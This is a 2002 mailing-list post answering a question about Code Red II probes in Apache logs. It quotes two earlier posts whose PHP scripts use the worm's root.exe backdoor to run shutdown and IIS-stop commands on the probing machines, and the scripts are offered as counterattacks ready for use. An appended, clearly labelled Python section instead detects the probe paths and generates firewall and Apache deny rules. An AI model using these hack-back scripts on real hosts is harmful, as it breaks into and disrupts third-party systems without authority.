[NTLUG:Discuss] Unusual httpd logs (scripts attached)

Richard Geoffrion ntlug at rain.lewisville.tx.us
Sat Jun 15 14:25:21 CDT 2002


----- Original Message -----
From: "david ross" <david at rawcreations.net>
To: <discuss at ntlug.org>
Sent: Wednesday, June 12, 2002 5:36 PM
Subject: [NTLUG:Discuss] Unusual httpd logs


> OK, I know I said unusual, but it's really not. What I'm looking for is a
> script I saw posted here for shutting down a remote machine that keeps
> filling my logs with the same GET request.
> <snip>
> [Wed Jun 12 11:09:30 2002] [error] [client 12.237.176.176] File does not
> exist: /html/scripts/root.exe
> [Wed Jun 12 11:09:30 2002] [error] [client 12.237.176.176] File does not
> exist: /html/MSADC/root.exe
> [Wed Jun 12 14:29:16 2002] [error] [client 12.237.176.176] File does not
> exist: /html/scripts/root.exe
>
> How can I stop this? I added this IP to hosts.deny but that didn't work,
> and I'm not familiar at all with ipchains.
> TIA, David
>

I think you are looking for THIS former post..

[former post]
In a properly configured Apache setup and PHP setup with track_vars on, you
could also use something like the following.

<?php
$remoteserver = fopen("http://" . $REMOTE_ADDR .
"/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");
$response = fread($remoteserver,0);
mail($SERVER_ADMIN, "Code Red II Attack", "Remote IP:
$REMOTE_ADDR\n\n\nServer Name : $SERVER_NAME\n\n\nServer Port :
$SERVER_PORT\n\n\nRequest URL : $REQUEST_URI\n\n\nResponse : $response",
"From: coderedkiller@$SERVER_NAME\n");
?>

This code should shut the machine down.  Power down on most systems.  Plus
it sends you a nice little e-mail you can use to track all these lamos who
after a month and a week still run around with their pants down.  The only
thing I'm not sure of in the code is the response.  With the size set to 0 I
figured it would just run the specified command take the result and die
sending me the response so I would know if it ran right or not.  It does not
seem to be doing that so if you wanted you could easily skip that step or
see if you can make it work and please let me know how you did it.

[/former post]


-----------or this one----------

[another former post]
Code Red hits continue to hit my web server in a fairly constant stream.
Obviously no new variants are running and so the latest version continues to
be the one.  As we all know, @Home users have fallen victim to the
mass-ignorance of its ubiquitous Microsoft users.  These "install all
options and let all defaults fly" users are blissfully unaware of their role
as the target of blame for a loss in quality of service for a great number
of @Home users.

*I* am an @Home user and I currently still have "normal" access to the
internet both incoming and outgoing.  I would like to protect my "internet"
by running a counter-attack.  I have been running a "default.ida" file that
is actually a PHP4 script (apparently) designed to shut down some services
but that does not shut down the Code Red process(es).

With this, I am soliciting for the most effective anti-code-red code I can
install onto a Linux/Apache/PHP4 server.  I am unashamed to host such code
as such a vigilante move is the only foreseeable means by which we can
protect our own interests.  I'm completely unhappy with the casual ignorance
of most MS users (ignorance by design) and the blanket method @Home was
forced into [permanently?] applying against its users.

The worst part is that @Home's move, while protecting many users against
infection, protects infected users from disinfection!  How is that for
irony?  So the infected and protected users remain free to transmit their
flags of stupidity free from the backlash of hackers and vigilante code.

Here is my vigilante code:

---
default.ida:
<?
        $command  = "lynx -source http://";
        $command .= $REMOTE_ADDR;
        $command .= "/scripts/root.exe?/c+iisreset+/stop";

        $retvalu  = exec($command);
?>
---

Simple, yet [hopefully] effective.  I know that there are methods at PHP's
disposal to perform the same function(s) for which "lynx" is being used.
But simplicity was part of the goal in this case.  However, for reasons stated
above, I don't believe I'm making the most of the situation here.

I know that "Code Red" is an old issue, but it's actually very much alive
and as far as I'm concerned, a valid and active one.

Now, I know that in addition to the port 80 vulnerability, the newest breed
of Code Red also opens a backdoor of some type.  My question is if this
backdoor can be exploited in spite of the blocked port 80?  And if so, how?

[/another former post]

Of course you can look back into the NTLUG Discuss August 2001 archives for
all of the debates on the ethics of all of this.

I wonder.....for those who do NOT have PHP configured and running, I suppose
it would be possible to manually execute a specific URL on a case-by-case
basis....hmmm....  Well if the admin of the offending user keeps getting his
server shut down then maybe he'll go looking for the reason and find 'the
problem'.


Hope this helps.

-Richard
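As an added example that is not part of the original thread or either former post, a defender-side alternative to the counterattack scripts: parse error_log lines in the format David quoted, count the worm probe paths per client, and emit ipchains and Apache deny rules for the noisy sources (hosts.deny does nothing here because Apache is not a tcp_wrappers client). The sample log text and the 10.0.0.5 and 192.0.2.9 addresses are constructed for the example; the threshold is an assumed tuning knob.

```python
import re
from collections import Counter

# Constructed sample in the Apache 1.3 error_log format quoted in the thread;
# the 12.237.176.176 entries mirror David's, the others are made up here.
SAMPLE_LOG = """\
[Wed Jun 12 11:09:30 2002] [error] [client 12.237.176.176] File does not exist: /html/scripts/root.exe
[Wed Jun 12 11:09:30 2002] [error] [client 12.237.176.176] File does not exist: /html/MSADC/root.exe
[Wed Jun 12 11:12:02 2002] [error] [client 10.0.0.5] File does not exist: /html/favicon.ico
[Wed Jun 12 14:29:16 2002] [error] [client 12.237.176.176] File does not exist: /html/scripts/root.exe
[Wed Jun 12 14:30:00 2002] [error] [client 192.0.2.9] File does not exist: /html/c/winnt/system32/cmd.exe
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[\d.]+)\] "
    r"File does not exist: (?P<path>\S+)$"
)

# Request paths typical of IIS worms (Code Red II / Nimda); they are harmless
# 404s on Linux/Apache but identify the infected source reliably.
PROBE_RE = re.compile(r"/(root\.exe|cmd\.exe|default\.ida)$", re.IGNORECASE)

def probe_counts(log_text, threshold=1):
    """Return {client_ip: probe_count} for clients at or above the threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and PROBE_RE.search(m.group("path")):
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

def ipchains_rules(offenders):
    """ipchains syntax (the questioner's kernel era); iptables would use -j DROP."""
    return [f"ipchains -A input -s {ip} -j DENY" for ip in sorted(offenders)]

def apache_deny_block(offenders):
    """Block at the web server instead: Order allow,deny lets Deny override Allow."""
    lines = ["<Location />", "    Order allow,deny", "    Allow from all"]
    lines += [f"    Deny from {ip}" for ip in sorted(offenders)]
    lines.append("</Location>")
    return "\n".join(lines)

if __name__ == "__main__":
    hits = probe_counts(SAMPLE_LOG, threshold=2)  # ignore one-off probes
    for ip, n in hits.items():
        print(f"# {ip}: {n} worm probes")
    print("\n".join(ipchains_rules(hits)))
    print(apache_deny_block(hits))
```

Run it against the real error_log instead of SAMPLE_LOG and review the output before loading the rules; a shared proxy or NAT address can carry both infected and innocent clients.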
